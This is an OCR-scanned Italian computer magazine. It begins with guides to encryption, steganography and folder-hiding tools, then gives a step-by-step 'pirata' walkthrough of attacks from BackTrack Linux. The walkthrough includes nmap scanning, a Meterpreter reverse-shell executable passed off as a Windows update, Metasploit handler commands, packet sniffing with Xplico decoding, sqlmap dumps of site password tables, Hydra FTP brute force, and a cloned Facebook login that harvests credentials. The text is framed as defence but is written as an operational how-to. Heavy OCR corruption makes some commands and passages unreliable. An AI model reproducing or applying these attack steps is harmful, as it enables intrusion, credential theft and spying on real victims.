generatore, è possibile selezionare i tipi di 
caratteree la lunghezza della password: 


Blizzard genererà la master key in base ai 
parametri disposti dall'utente. Dopo aver 
elaborato la master key ritenuta idonea, 
è sufficiente cliccare sul pulsante OK e 
Blizzard immetterà automaticamente 
la stringa all'interno delle caselle d'in¬ 
serimento nell'apposito pannello della 
finestra dedicata alla cifratura dei file. 
Sicurpas a questo punto offre la possi 
bilità di archiviare la password o parte di 
essa in un file nativo SRD cifrato che potrà 
essere utilizzato per la codifica e decodi¬ 
fica della nostra cartella: in questo modo 
non si ha alcun bisogno di rammentare 
la password. Per creare il file è sufficiente 


cliccare sul pulsante Salva password 
nel pannello di inserimento della chiave 
di cifratura, selezionare il percorso di 
archiviazione e dare un nome al file. Si 
tenga presente che il file in oggetto è in 
grado di rammentare il percorso dove 
viene creato per la prima volta, quindi, 
se vogliamo renderlo inservibile basterà 
spostarlo in un'altra cartella (ad esempio 
su una chiavetta USB). Quando vogliamo 
decodififcare una cartella ricorrendo al 
file SRD è necessario cliccare sul pulsan¬ 
te Importa password, selezionare il file 
stesso e lasciare che Sicurpass faccia il 
suo dovere. 



LA NUVOLA 
[MOBILE 

Lo spazio doud appena 
creato con owndoud 
può essere comoda¬ 
mente gestito anche da 
smartphone Android 
oiPhone. Per farlo 
dobbiamo innanzitutto 
scaricare l'app ufficiale 
ownCloud dallo store 
on-line dei nostro tele¬ 
fonino. Il funzionamen 
to è in tutto e per tutto 
simile all'applicazione 
desktop vista nei passi 
precedenti. Memori; 
zandoifiteinunacai 
fella dello smartphone, 
questi verranno sincro¬ 
nizzati subito sul server 
(o appena è disponibile 
una connessione a 
Internet). Inoltre, l'app 
permette anchedi 
effettuare lo streaming 
dei file audio e video 
presenti sul server, oltre 
ad aprire direttamente 
alcuni tipi di file, quali 
PDF e alcuni formati di 
Office. 


SICURPASS A 
PORTATA DI CLIC 


Tra le tante funzioni 
di Sicurpass ce n'èuna 
che permette di cifrare 
un file o una cartella 
con un semplice clic del 
mouse. Da Esplora risor 
so, infatti, è sufficiente 
selezionare col tasto 
destro del mouse il con 
tenuto da proteggere e 
scegliere, dal menu con¬ 
testuale, la voce Mirro 
a.. ./Sicurpas fntware. 
Tutti ! Ale selezionati 
o presenti nella car¬ 
tella verranno caricati 
automaticamente in 
Sicurpass pronti per 
essere messi 'sotto 
chiave”! In alternativa, 
è sufAciente trascinare 
con mouse gli stessi con¬ 
tenuti sull'interfaccia 
principale di Sicurpass, 
all'interno della sezione 
dedicata alla cifratura 
di Ale e cartelle 
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Dati a prova 
d’intercettazione 

Così proteggi i documenti memorizzati sul tuo disco 
rigido e ne rendi impossibile la lettura ad occhi indiscreti 


Cosa ci 
occorre 

TOOL Dì 

STR’iANClGHAFlA 

STEGANOIMAGE 

Ou.uHo coi’.i Gratuito 
Sito Ifiteriist 

http://stegano«rTiage. 

sourcetorge.net 


SOFTWARE 
DI SICJREZZA 

HIDE FOLDERS 

: r ’ : Gratuito 

Siti internet 

www.ntoetoidefs.orB 


C iti utilizza il PC per conservare 
documenti e, in generale, file 
personali, deve tenere molto 
in considerazione il fattore sicurez¬ 
za. Può succedere, ad esempio, a 
casa o in ufficio, di lasciare il com¬ 
puter incustodito e a disposizione 
dpi primo curioso di passaggio (ci] 
sia un collega o un familiare poco 
importa), pronto a sbirciare tra i 
nostri file personali. Per evitare ciò 
basterebbero invero alcune piccole 
accortezze, come ad esempio, quel¬ 
la di abilitare uno screen saver che 


si attivi dopo qualche minuto che 
ci si è assentati dalla postazione 
e che richieda l'inserimento della 
password, oppure quella di proteg 
gere le cartelle con i documenti più 
importanti o le immagini più perso¬ 
nali. Windows 7 consente di cifra¬ 
ie e cartelle, ma non sempre la 
procedura è di immediata amiazio 
inoltre trovarci nella 



necessita di inviare file e documenti 
in modo tale che soltanto U desti¬ 
natario sia in gradrvdi intf'Jjjretnre 
correttamente le informazionirice 


vute. in questo caso però Windows 
non può venirci in aiuto. La migliore 
cosa da fare è, in questi casi, quella 
di utilizzare software di terze parti 
conte Slegano!mage, che consente 
di nascondere dei file all'interno di 
immagini, Hide Polders, che rende 
“invisibili" intere cartelle, e Fnc- 
ryptOnClick, ottimo per protegge¬ 
re con una password file e cartelle 
utilizzando un fortissimo algoritmo 
di cifratura (ALS a 256 bit). Cosa 
aspettiamo allora? Vediamo subito 
come utilizzarli al meglio! 


TOOL fi! CRirTOGRAFIA : 

ENCRYPTON 

CLICK 

Guani f.osL Gratuito 
Sito Internet. 

www.2brigtitspaites.coni 


13 Nascondi tutto in 

Utilizzando il programma Steganolmage possiamo includere uno o più file importanti aH’interno 
di una qualsiasi immagine in formato PNG in modo da proteggerli in modo sicuro da sguardi indiscreti. 






installiamo il software 

•J 1 Scorri pattiamo sul disco rigido l'archi- 
w vio compresso Steganolmage.zip (lo 
trovi sul CD-Rom) e facciamo doppio clic sul 
file Steganolmage-1.0- setop.exe. Seguia¬ 
mo la procedura guidata: al termine lasciamo 
selezionato Run Steganolmage e clicchiamo 
su Finish. 


^ Cosa vogliamo 
21 nascondere? 

- Avviato il software, canchiamo I immagi¬ 
ne (in formato PNG ) che conterrà il testo (o il file) 
da nascondere. Digitiamo in Message testo, 
mentre con Add file includiamo i file da Incorpo¬ 
rare nella foto Digitiamo una password in Enc- 
rypt Key e premiamo Embed. 


* Ora scrutiamo dentro 
3 | rimmaqine 

.... J La procedura per leggere il contenuto di 
un file creato con Steganoimage è molto faci¬ 
le. Con Loaó carichiamo il file, digitiamo quindi 
la password che ne protegge il contenuto. Oc¬ 
chiamo quindi su Exract per visualizzare il testo 
nascosto e gli eventuali file incorporati. 
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Le cartelle non si vedono più! 

Se al nostro computer accedono più utenti, la cosa migliore da fare per proteggere le cartelle che contengono 
file personali e quella di renderle invisibili. Servendoci del tool Hide Folders bastano pochi clic! 
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Prima di tutto la password 

"| Fslra amo dall'archlvic Hidefblderszip 
(lo trovi sul CD-Rom) il file hidcfolders- 
setup.exe ed eseguiamola Installato ravvilo I 
il software, cucchiamo su Adde selezioniamfiaf 
cartella da-nascondere. Cuccando su Password 
indichiamo la password per la cartella 


^ Nascondiamo le cartelle 

2 ! Per nascondere una cartella (e le sue 
-w* sottodirectoryi clicchiamo su Hide. Se 
raggiungiamo con Esplora risorse il percorso 
iriTiuteitrova la cartella noteremo che essa non 
è pili visibile Per accedervi da Hidden Folder 
cliccniamo con il destrosulla cartella e sceglia¬ 
mo Open Folder. 



^ Visibile, ma solo per pochi! 

3 | Per visualizzare nuovamente il contenu- 
to della cartella appena nascosta basta 
selezionarla dall'elenco della pagina principale 
del programma e cliccare sul pulsante Unhide. 
Immessa la password corretta, la cartella e il 
suo contenuto saranno nuovamente accessibili 
da Windows. 


3 Chiudi i file in cassatoti 

Per mettere al sicuro documenti e cartelle che contenoono informazioni importanti la cosa migliore da fare 
è proteggerli ricorrendo alla crittografia. Con EncryptOnClick possiamo farlo in modo semplice e veloce. 


e 




-v Proteggere un file o una cartella 

: Eseguiamo il file FncryptOnClick._SeUip.exe contenuto nell'archivio 
- J compresso EncryptOnClick zip (presente sul CD-Rom). Avviato il sol 
tware in tncypt premiamo File (o Folder). selezioniamo 1 1 file (o la cartella) da 
cripta re e digitiamo la password. Il file criptato avrà estensione .eoe. 


Tutto di nuovo in chiaro 

2 I Per decriptare un file con estensione eoe cucchiamo due volte su 
di esso (in alternativa avviamo il programma EncyptOnClick e in 
Decrypl cucchiamo su File o Folder) e digitiamo la password di sblocco 
L’estensione originaria del file verrà ripristinata e potremo quindi accedere 
normalmente al suo contenuto 
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Hacker 
segreto 

Abbiamo “smanettato” con il kit 
che buca la rete e attiva un canale 
autorizzato sul PC del malcapitato 


I l rischio più probabile a cui andiamo in¬ 
contro ogni volta che usiamo un PC c che 
1 nostri dati vaghino in giro per la Rete, 
finendo nelle mani sbagliate. A quel punto, 
chiunque abbia un minimo di conoscenze 
tecniche e sia a conoscenza del nostro indi¬ 
rizzo IP, riuscirà ad analizzare l'intero traffico 
di rete, inclusi i siti Web che raggiungiamo 
o le password che digitiamo. Per farlo, puf) 
intraprendere differenti strade ma senza 
ombra di dubbio la più conosciuta, rapida e 
funzionale è quella di sfruttare le vulnerabi¬ 
lità del sistema operativo che utilizziamo. 

Sistemi operativi a rischio 

Inutile precisare che il pirata preferisce avere 
ache 'arerori gli utenti Windows che, fra gli 
OS più conosciuti, è di sicuro quello più a 
rischio e sul quale è più semplice installare 
una backdoor per farsi poi spazio nell’hard 
disk. Ma non dobbiamo dimenticare che Mac 
OS X o lo stesso Linux non sono esenti da tale 
problematica: ogni sistema operativo ha, 
infatti, il suo tallone d’Achille e l’unica arma 
che abbiamo a disposizione pei difenderci è 
quella di conoscere tutte le vulnerabilità del 
sistema che utilizziamo. Lpoic’èLacebook, 
il luogo preferito non solo da milioni di utenti 
sparsi perii mondo ma anche dai pirati asse¬ 
tati di dati altrui. Riuscire a creare un clone 
perfetto deH’home page del social network in 
blu è veramente un gioco da ragazzi e ai pirati 
basta poco per dirottarci su queste pagine 
fasulle dove, ignari del pericolo incombente, 
andremo ad effettuare il login usando user- 
namee password del nostro account! Come 
difendersi? imparando ad usare le stesse armi 
d’attacco dei pirati! Immergiamoci, dunque, 
in questa nuova avventura, analizzando ogni 
singolo caso e ogni possibile minaccia: solo 
cosi riusciremo a creare un'invalicabile linea 
di difesa. 


Cosaci 

occorre 


, uurrju 


TOOL 01 HACKING 

BACKTRACK 

LINUX 

«gi:ai',7iiiHHtiiMi.nii> 

Sita Internet: 

www.wi rena gazine. 
it/link/2159 
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3 Grimaldello da taschino 


Lo strumento preferito dai pirati per intrufolarsi nei computer altrui è la distribuzione BackTrack Linux: semplice 
da usare e ricca di tool adatti allo scopo, può essere installata anche su chiavetta USB. 




^ Tutt o su un DVD 

■| | Sul Web DVD è presente il file BT5R1- 
GNOMF-32.iso con l'immagine della 
distribuzione da masterizzare. Inseriamo un DVD 
vuoto nel masterizzalore, avviarne Nero Bur 
ning Rom e cucchiamo su Masterizz , 
vi immagine . 


▲ Dentro al BIOS 

2 | Terminata la masterizzazione, riavviamo il 
—- PC. Accediamo al BIOS premendo Cane e 
impostiamo il boot da periferica DVD. L’operazio¬ 
ne varia in base al tipo di scheda madre installata 
nel computer. Inseriamo quindi ne! lettore il disco 
/È di.BackTrack e riawiamo nuovamente il PC. 


>> Avviamo la distro 

2 - Verrà caricata la distribuzione. Nella scher 
mata di boot che appare selezioniamo Bac 
kTrack Text e confermiamo con Invio. Digitiamo 
il comando startx, premiamo Invio e attendiamo 
il caricamento dell'interfaccia grafica La distro è 
pronta per essere usala in modalità Uve DVD 


* Usiamola da chiavetta 

“J ; Colleghiamo una pendrrve con almeno 4 GB 
-.- di spazio libero ad un ingresso USB disponi¬ 

bile sul computer e cucchiamo sul pulsante Instali 
BackTrack 5RI presente sulla Scrivania. Selezio¬ 
niamo quindi la lingua Italiano » avviamo la proce 
dura guidata con un clic sul pulsante Avanti. 


* Partizioni da smontare 

2 \ Proseguiamo fino a raggiungere la sche- 
- ' da Disposizione della tastiera Scegliamo 
l'opzione Italia e rispondiamo cliccando su Si alla 
domanda Smontare le partizioni in uso. Cosi laceri 
do potremo installare BackTrack 5 Ri anche sulla 
pendrive USB collegata precedentemente al PC. 


^ La pendrive è pronta! 

3 Cucchiamo su Avanti fino a raggiungere la 
- scheda Preparazione spazio sii disco Sce 
gliamo l’opzione Cancella e usa l'intero disco firn 
quelle proposte Dal menu a tendina selezioniamo 
la periferica USB (indicata con sdb) e confermiamo 
premendo ancora una volta il pulsante Avanti 



Rendiamola av viabile 

4 | Prima di procedere all’installazione definitiva della distro, cucchiamo 
- sul pu sante Avanzato. Abilitiamo l'opzione Installare il boot leader e 
selezioniamo dal menu a tendina la pendrive USB (nel noslro caso, cucchia¬ 
mo /dev/sdb). Confermiamo con un clic sul pulsante OK. 


Installazione in corso 

g Non rimane che cliccare sul pulsante installa o attendere che I instai 
lazione venga correttamente portata a buon line. Completata la pro¬ 
cedura guidata, potremo ravviare il computer ed effetluare il boot dalla peri 
fenca USB, impostando la voce corretta nel BIOS (Passo 2) ► 
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Accesso non autorizzato 

Grazie al programma Nmap, il pirata rileva l’indirizzo IP e il sistema operativo della vittima. In questo modo potrà 
identrficare facilmente i punti deboli del computer attaccato per usarli a proprio vantaggio. 
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a Scansion e in corso 

■J ] Ottenuto l'accesso alla LAN cutècoleg 
ta la vittima, ii pirata awia il termit 
digita il comando nmap -sP - PT60 seguito dal 
range di indirizzi IP da scagionare |nel caso in 
esempio, da 192.163.114.1 a 192168.114. M 
Conterma con Invio e attende il risultato, 


* Porte ap e rte sul PC 

2 ; Osservando l'output ottenuto, decide di 
analizzare ogni singolo IP rilevato. Digita 
comando nmap -sS seguito dall’indirizzo della 
vittima (nell’esempiOj^Z 168.114.1) e attende 
che l’elenco delle eventuali porte aperte sul PC 
della vittima venga moscato su schermo. 


OS rilevato! 

3 il Pirata continua la sua fase di analisi cer- 
cando di scoprire quale tipo di sistema 
operativo è utilizzato sul computer della vittima. 
Digita quindi il comando nmap -0 seguito dall’in¬ 
dirizzo IP (nel caso in esempio, 192168.114.1) e 
attende che venga visualizzato il verdetto 


3 Rete bucata in tre mosse 

Le falle di sicurezza degli OS più diffusi consentono al pirata di intrufolarsi agevolmente nel nostro PO. Per farlo, 
deve prima creare un “payload”, cioè un programma per l’accesso da remoto. Ecco in che modo. 



^ Tutto da linea di comando 

■j Avviata una nuova sessione del Terminale 
il pirata accede con cd alla directory pen- 
tesl/exploìts/sete impartisce il comando ./set per 
avviare il software Set. Sceglie l’opzione 4 per cre¬ 
are un payload e un listener (una lista di operazioni 
da eseguire) da iniettare nel PC della vittima. 



^ Ob iettivo: Windows 

2 é Supponendo che il pirata voglia colpire un 
- ; ; PC con sistema operativo Windows (quello 
rilevato in precedenza da Nmap), il pirata digita 2 
e conferma con Invio per scegliere l'opzione Win¬ 
dows Reverse TCPMeterpreter (mediante il qua¬ 
le controllerà il PC vittima da Terminale). 



^ | Una porta d’ingresso 

3 A questo punto ii pirata crea un t ile esegui - 
bile capace di sfruttare una backdoor attiva 
sui PC bersaglio. Digita quindi 16 e conferma con 
Invio. Indica una porta di ascolto (nel nostro caso 
abbiamo scelto la 4444) e preme nuovamente 
Invio. Attende dunque che Y.exe venga generato 
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Creata la backdoor, il pirata sfrutta alcune tecniche di ingegneria sociale per installarla sul PC 
della vittima. Per riuscire a prendere il controllo del sistema da remoto, usa il tool Metasploit 



H file fondamentale 

■J 1 Usando i! file manager di BackTrack, il pirata raggiunge 
- la directory set in pentest/exploits con il cornando cd. 
Copia quindi il tile msf.exe creato in precedenza (Passo C3) e, 
tramite pratiche di social engineering, lo trasferisce SU | pc della 
vittima, avviandolo. 


ig|p trasferisce : 

« 1 / 1 * 



a Ecco l a porta d’a ccesso 

2 ì II pirata lancia prima il comando use exploit/mutti/han- 

. dler e poi set payload windows/meterpreter/reverse_ 

tcp. Indica l indirizzo IP della vittima con set thost (nel caso in 
esempio. 192.168.114.1 ) e la porta configurata in precedenza 

'Passo C3) con set Iport 4444. 


a Metasploit in azione 

2 I A questo punto, il pirata avvia una sessione del Termina 
Zj le e con il comando cd raggiunge il percorso /opt/frame 
work/'msf3. Digita il comando / msfconsole per avviare il sof¬ 
tware Metasploit, che utilizzerà per controllare anche da remoto 
il sistema della sua vittima. 



a T raguardo raggiunto! 


4 . Il pirata dà il comando exploit e attende che la vittima 
— J avvìi il file msf exe, magari facendole credere che si tratti 
di un update di Windows Non appena il pesce avrà abbocca¬ 
to, Metasploit restituirà un messaggio di conferma e avv era i 1 
meterpreter creato dai pirata 1 


SOCIAL 

ENGINEERING 

l'ingegneria «odale è 
un insieme di tecniche 


adottate dai pirati 
informatici (e, più in 
generate, dai truffatori) 
per venirea conoscenza 
delle informazioni 
personali delle loro 
vittime. 


EXPLOIT 

Con questo termine 
si identifica un codice 



dei sistema operativo 
attaccato, porta all'ac¬ 
quisizione di privilegi di 
amministratore. 


BACKDOOR 

Si tratta di una porta di 
comunicazione aperta 
sul sistema vittima che 
permette di bypassare 
le eventuali protezioni 
attive. 

PAYLOAD 

Letteralmente, carico 
utile. Indica quella 
parte di codkedi un 
malware che svolge il 
lavoro 5 porco'.cioè 
le operazioni che 
permettono al virus 
di infettare il sistema 
dell'utente. 



a Nel PC delta vittima! 

g 1 II pirata ha ora a disposizione una serie di comandi che 
w* può usare per controllare da remoto la copia di Windows 
7 installata nel PC del malcapitato. Per scoprirli, digita help Per 
catturare ad esempio una schermata del desktop, gli basta sem¬ 
plicemente lanciare il comando screenshot. 


a Pieno controllo 

0 Può inoltre awiare'e gestire il Prompt dei comandi d 
Windows digitando semplicemente comando execute 
-fcmd seguito da Invio o addirittura spegnere il PC della vittima 
lanciando il comando shuttìown. E non c’è antivirus o firewall 
che tenga; anche Windows 7 è stato bucato! 
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^ Una spia in rete 

■j In BackTrack il pirata avvia 
. sessione del Terminale e digita il col 
do kismet per avviare il tool di snifling (analisi del 
traffico) di rete. Alla domanda Start Kismet Server 
risponde rese attende qualche secondo affinché 
il software si configuri automaticamente. 


Wireless sotto controllo 

Quando viene richiesta l'aggiunta di un'in¬ 
terfaccia di rete, il pirata conferma con 
il campo Mcon il nome assegna 
(ad esempio wianOì e 
conferma con Adtì Per cjfcscere le interfacce di 
rete digita da Terminateti coniando iwconfìg. 


9 In ascolto sulla 


^ Sniffino in corso 

2 . Kismet è pronto e operativo. Tutti i pac- 
—* chetti trasmessi ini rete e catturati vengo¬ 
no visualizzati nell'interfaccia grafica principale 
del software. Quando il pirata avrà raggiunto la 
quantità di dati desiderata, può fermare la cattura 
con Disconnect presente nel menu Kismet. 


Password e codici di accesso 


Dopo aver ottenuto l’accesso al sistema attaccato, il pirata riesce a catturare tutti i dati in transito sulla nostra 
rete senza fili, per poi analizzarli vedendo in chiaro password e non solo! 


Il nemico potrebbe anche nascondersi all’interno delia nostra rete locale interna e, utilizzando Wireshark, riuscire 
a sniffare i pacchetti che viaggiano via cavo. Ecco la tecnica utilizzata. 



▲ Il tool gi usto 

1 


j II pirata raggiunge la voce Wireshark dal 
menu Applications/BackTrack/Informa- 
tion Gathering/Network Analys&Network Trat- 
fic Analysis. Avvia quindi il software verificando di 
essere in possesso dei privilegi di amministratore e 
clicca su List thè available capute interiaces 



a Ecco i pacchetti! 

2 Sceglie fra ethO o wlanOe avvia il processo 
' cliccando Start. Lo sniffing ha inizio tutti i 
pacchetti in transito vengono visualizzati nell in¬ 
terfaccia principale di Wireshark. Quanco il pirata 
avrà raggiunto il suo obiettivo, torma il processo 
cliccando Stop thè running live capture 



a É tutto memor izzato 

2 A questo punlo il pirata si sposta nel menu 
- - File e seleziona l'opzione Save per salva¬ 
re una copia di tutti i pacchetti catturati. Indica un 
nome ed una director/ di destinazione e termina 
con un clic sul pulsante Save Può quindi chiude 
re Wireshark. 
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1 Inizia l’analisi dei dati 


Dopo aver sniffato il traffico di rete, per il pirata è giunto il momento di “tradurre" tutti i pacchetti 
criptati. Ecco come e cosa fa per leggere in chiaro e-mail, messaggi di Chat e cronologia Web. 



L’interprete dei dati 

“| I Per rendere leggibili i dati sniffali dalla rete, il pirata usa 
-=^J il tool Xplico. Per avviare la comoda interfaccia Web di 
gestione, raggiunge la voce xplico web qui presente nel menu 
Applications/ BackTrack/Intormatioii Gathering/Network 
Analysis/Nelwork Traffic Analysis 


ilio/i Gatherlng 

Vi/t. 


a Xp lico è operativo 

2 f A questo punto, il pirata apre una nuova scheda del Ter- 
■■■ ■■' minale e avvia Xplico lanciando il comando /etc/init.d/ 
xplico start seguito da Invio. Attende qualche secondo affinché 
il servizio venga correttamente eseguito e avvia il browser senza 
chiudere la finestra del Terminale 
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a Accesso in corso 

3 II pirata digita http://localhost.9876 nella barra indiriz- 
• zi di Firelox (preinstallato in BackTrack). Meli’interfaccia 
Web di Xplico decide di autenticarsi usando xplico come User- 
name e xplico come Password Non gli rimane altro da fare che 
confermare con un clic su Login. 


* Un caso da analizzare 

^ Appare quindi il menu principale dell’interfaccia Web di 
Xplico. Il pirata clicca sul pulsante New Case e, nella 
sezione Data Acquisitìon. sceglie l'opzione Uploading PCAP 
capute file/s. Assegna un nome al caso da analizzare e confer¬ 
ma la sua creazione con un clic su Create. 
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UNO SNIFFER 
ALTERNATIVO 


Finora abbiamo visto 
come il pirata utilizza 
strumenti dei calibro di 
Kbmet o Wirashark par 
sniffare tutto M traffico 
in transito su una rete. 
Tali software, grazie al¬ 
la presenza di unInter¬ 
faccia grafica risultano 
alquanto semplici ed 
intuitivi. Ma, come al 
solito esiste qualcosa 
di alternativo che 
funziona direttamente 
da linea di comando. 
Stiamo parlando di 
Tcpdump, un ottimo 
snifferanch'esso inte¬ 
grato in BackTrackS 
RI e comunque instai 
labile su tutte le altre 
distribuzioni Linux. 
Nonostante sia privo di 
interfaccia grafica, il 
suo utilizzo è veramen 
te semplice: al pirata 
basta infatti lanciare 
da Terminale il coman¬ 
do tcpdump per avviare 
losnifferche catturerà 
dunque tutto ciò che è 
in transito sulTinterfac 
daethO.Per affinare la 
sua opera, utilizzando 
magari l'interfaccia Wi- 
fi, il pirata scopre una 
completa lista delle 
opzioni disponibili con 
il comando tcpdump 
■hefp. 


^ Una nuova sessione 

g § Il pirata seleziona il caso appena creato e clicca sul pul- 
— sanie New Session presente nel menu a lato dell’inter 
faccia Web di Xplico. Fornisce un nome al processo (ad esem 
pio, decodifica) e conferma con un clic su Create t atto questo, 
accede alla sessione appena creata. 


± I dati sono in chiaro! 

0 II pirata si sposta in Pcap set e preme Browse oer cari- 
— * care l'output restituito da Wireshark o Kismet Conferma 
con Uploade attende che i pacchetti vengano decodificati Ogni 
tipologia di dato acquisito viene inserito nella relativa categoria 
(Mail. Web Chat VOIPecc.). 


► 
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13 Siti Web sotto assedio 


Siamo sicuri che i nostri bloa creati con Joomla e Wordpress siano al sicuro? Ecco come un pirata riesce ad ottenere 
l’elenco degli utenti registrati con le relative password ai accesso. 



^ Un tool tuttofare 

"I Do Applications il pirata si sposta in BackTrack/Exploitation Tools/ 
Web Exploitation Tools e ama I programma sqlmap. Ricerca poi sul 
Web il bersaglio da attaccare accederti) ad una pagina interna del sito il cui 
indirizzo abbia una sintassi del tipo 


a Ecco i database 

2 II pirata digita quindi nel Terminale il comando pytbon sqlmap.py 
-u URL bersaglio - dbs seguito da Invio per ricercare l’elenco del 
database che compongono il sito Web I operazione dura diversi minuti ed e 
fortemente legata alia grandezza del bersaglio prescelto. 




a Le tabelle con i dati 

^ Ma ■ pirata può andare anche piu a fondo, scoprendo Quali tabelle 
compongono il database. Per farlo, lancia il comando pytbon sqlmap 
py -u URL_bersaglio -D Nome_Database -tables. Anche in questo caso la 
durata del processo dipende dalla grandezza del database. 


^ Informazioni riserva te 

•i Per il pirata è giunto il momento di scoprire il nome delle colonne 
contenute nelle tabelle appena visualizzate. Per farlo, digita quindi 
il comando pytbon sqlmap.py -u URL_bersaglio -0 Nome Database -T 
Nome_Tabella -columns e attende che sqlmap dia un risultato. 
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a Ancora più a fondo 

0 : A questo punto. I pirata digita python sqlmap.py -u URL bersaglio 
-D Nome Database -T Nome_ Tabella -C Nome_ Colonna -dump 

per visualizzare in chiare tutti gir indici di una precisa colonna (ad esempio 
quella che contiene gli d degli utenti che accedono al sito). 


^ I dati di accesso sono qu i 

0 Al pirata non rimane altro da fare che impartire il comando pytbon 
. : sqlmap.py -u URL_bersaglio -D Nome_Database -T Tabeila_user 
-C Colonna_ username [oppure Colonna_ passwef) -dump e visualizzare 
l'elenco completo contenente tutti i dati degli utenti registrati al sito! 


70 Win Magar'ne Speciali 


































































Hacker il disco segreto | Faldate 


investigatore in* 


FILE SYSTEM E SERVER FTP SONO A RISCHIO 


Come abbiamo visto nel Macropasso D, gra 
zie a BackTrack il pirata riesce facilmente ad 
accedere a un sistema remoto. Tra i comandi a 
disposizione del malintenzionato (vedi Passo 
D5|, ce ne sono alcuni relativi al controllo del 
file System. Digitando, ad esempio, il comando 
CO, riesce a spostarsi tra le cartelle dell'hard disk 
del malcapitato, mentre con LS ne visualizza 
il contenuto. 

Il software per scardinare l'FTP 

Fra le varie tecniche utilizzate dai pirati per 
entrare in possesso dei nostri file, lo sniffmg è 
senza ombra di dubbio quello più completo, 
proprio perché ogni protocollo viene analizzato 
Ma se l'obiettivo del malintenzionato è quello 
di scovare i nostri dati di accesso ad un server 
FTP, tutto diviene magicamente più semplice 
e, con un po' di fortuna, più breve. 

Grazie al software Hydra (anch'esso inte¬ 
grato in BackTrack 5 RI) il pirata riesc^ ’ 
sferrare un attacco di tipo biuteforc 
al server FTP, scoprendo la chiave d? 
accesso di un preciso nome utente. 

Appare evidente però che, almeno 
in questo caso, la lunghezza e la 


difficoltà della password concorrono alla ga¬ 
ranzia di maggiore sicurezza. Tutto sta anche 
alla ricchezza del dizionario utilizzato dal pirata. 
Negli attacchi di tipo brute force, infatti, non si 
fa altro che tentare numerose chiavi di accesso 
fino a beccare eventualmente quella corretta, 
Ma, con una breve ricerca sul Web, il pirata è 
in grado di scaricare un dizionario molto ben 
nutrito contenente migliaia se non milioni di 
combinazioni fra lettere e numeri differenti. 
Come si utilizza Hydra? Dopo aver avviato il 
Terminale, al pirata non resta che digitare il 
comando hydra I username vittima -p dizio¬ 
nario -f-Vindirizzo server ftp. Il processo ha 
durata variabile ed è fortemente dipendente 
dalla qualità del dizionario e dalla complessità 
della password utilizzata dalla vittima. 


DI Chat di Facebook in chiaro 


I nostri dati di accesso al social network non sono gli unici ad essere in pericolo, I pirati sono in grado di leggere 
anche le nostre conversazioni e per farlo devono semplicemente usare uno script pronto all’uso. 



Lo sc ript fondamen tale 

■j Dopo aver awiato BackTrack Macropas¬ 
so A), il pirata si collega a Internet e avvia 
il browser Firefox dal menu Applications/'lnternet 
Ricerca quindi direttamente su Google lo script 
borogove.py e ne avvia il download. Decide di 
salvare il file nella Home del sistema. 



▲ La giusta sintassi 

2 Al termine del download, il pirata apre il 
•w* file appena scancato utilizzando uh editor 
di testo (ad esempio. Gedit) per scoprirne la sin¬ 
tassi d’uso. Dovrà intatti indicare l’interfaccia liti 
lizzata (Ethernet o Wi-Fi) l’indirizzo IP da colpire 
e il Gateway della LAN. 



-a Script in azione! 

3 A questo punto, non deve fare altro ohe 
avviare una nuova sessione del Terminale 
e far partire lo script (nel caso in esempio, python 
borogove py etbO 192 168.1 12 192 168. 7.-7), 
Tutte le eventuali conversazioni su Facebook della 
vittima verranno mostrate in chiaro. ► 
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SITE CLONER 


Usando questa opzione 
del programma set, il 
pirata attua un attacco 
di tipo ARP, ovvero 
intercetta le richieste 
di un cileni per dirot 
tarlesuunaltrohost (in 
questo caso, il suo com - 
puter). Cosi facendo, 
riesce a reindirizzare 
la vittima sulla pagina 
di login clonata di Fa 
cebooli. 

GEWT 

Si tratta di un editor 
di testo non format¬ 
tato (cioè privo delle 
formattazioni tipiche 
che e possibile aggiun¬ 
gere, ad esempio, con 
Word: allineamento, 
paragrafo, interlinea 
ecc.) integrato in molte 
distribuzioni Linux. 

GATEWAY 

Permette di dirotterei 
pacchetti in arrivo dal 
Web verso la rete inter 
na. Generalmente, il 
suo indirizzo corrispon¬ 
de con l'IP del rguter. 

Un pirata che dovesse 
riuscire a prendere il 
controllo de! gateway 
riuscirebbe, ovviamen¬ 
te, a monitorare tutto 
il traffico di una rete 
locale. 


P 


9 Entrare nel profilo Facebook 

Usando l’ennesimo tool di hacking integrato in BackTrack Linux, il pirata riesce a creare 
una copia della schermata di accesso al social network per rubare i nostri dati personali. 
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Attacchi psicologici 

■j Dopo aver avviato BackTrao iMacropasso A), il pirata 
si sposta nella sezione BackTrack dei menu Applica¬ 



tions. Da Exploitation Tools/Social Engineering Tools/Social 
Engineering foplkit api e lo strumento che ta al caso suo: stia 

mo parlando ui Set (Macropasso Ci. 


^ Furto di dati 

3 Ecco un punto cruciale della sua opera di attacco: il fura¬ 
ta digita 3 e conferma con Invio per scegliere l'opzione 
Credential Harvester Attack Metfiod cosi tacendo, il clone di 
Facebook sarà in grado di tornire al pirata le credenziali di acces¬ 
so digitate dalla vittima 



^ Il sito è preso di mira 

g A questo punto, set chiede al pirata di immettere l'URL 
... r de! sito Web da clonare. Digita quindi https://www.face- 
book.com e conferma premendo Invio L operazione dura diversi 
secondi durante i quali I intero codice della home page di Face¬ 
book viene scaricato sul PC. 



^ L’attacco arriva dal Web 

2 Per il pirata e arnvato il momento di scegliere che tipo rii 
■ attacco sferrare: le opzioni fornite da set sono veramen - 
te tante ma poiché ha deciso di clonare un sito Web, digita 2 
per scegliere un Website Attack Veclors. Prosegue quindi pre 
mendo il tasto Invio. 



-t La clonazione ha inizio 

4 Al pirata non resta che digitare 2 e confermare ancora 
■ una volta la scelta premendo Invio. Così facendo, sce¬ 
glierà I opzione Site Cloner di set mediante la quale il software 
si occuperà di clonare l'intero contenuto di una pagina Web che 
a breve il pirata indicherà. 



Password in chiaro! 

g Qualsiasi computer connesso alla rete locale che tenta 
di accedere a Facebook visualizza quindi 11 clone appena 
creato dal pirata Ma la vittima, ignara di tutto digita i suoi dati 
di accesso per la gioia del pirata che li vede in chiara diretta 
mente sul Terminale. m 
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Tecniche e strumenti usati dai Pirati per leggere 
le conversazioni private effettuate con WhatsAnp! 


Così ci spiano 
i messaggi SMS 


W hatsApp è uno dei servizi piu usati per inviare SMS gratuiti tra gli 
utenti mobile, mediante una semplice connessione ad Internet. 
Non occorre neanche effettuare una registrazione, poiché viene 
sfruttato, come credenziale d'accesso, il proprio numero di cellulare. Seb¬ 
bene a prima vista questa soluzione sembri "comoda", in realtà è alla basedi 
un'importante fa Ila di sicurezza del sdpHain che al momento in cui scriviamo 
non è stata ancora risolta. I.a password che \ 


ene generata, infatti, non è 


